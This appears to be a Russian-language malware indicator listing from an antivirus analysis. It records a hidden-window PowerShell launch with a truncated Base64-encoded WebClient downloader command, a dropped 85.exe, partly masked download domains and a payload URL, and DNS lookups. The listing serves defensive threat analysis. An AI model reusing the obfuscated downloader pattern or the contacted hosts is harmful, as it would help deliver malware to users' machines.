Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMAA2AF8AMAA9ACgAJwBhACcAKwAnADYAMQAnACsAJwAyAF8ANABfACcAKQA7ACQAVgAyADgAXwBfAF8AOABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHYAXwA0ADIAXwAyADgAPQAoAC...
- %HOMEPATH%\85.exe
- 'qu##vn.com':80
- 'no####iannomad.com':80
- 'pa###oncern.com':80
- http://pa###oncern.com/eilRSaX2Ep
- DNS ASK qu##vn.com
- DNS ASK no####iannomad.com
- DNS ASK ku###x.online
- DNS ASK ra#e.by
- DNS ASK pa###oncern.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMAA2AF8AMAA9ACgAJwBhACcAKwAnADYAMQAnACsAJwAyAF8ANABfACcAKQA7ACQAVgAyADgAXwBfAF8AOABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHYAXwA0ADIAXwAyADgAPQAoAC...' (со скрытым окном)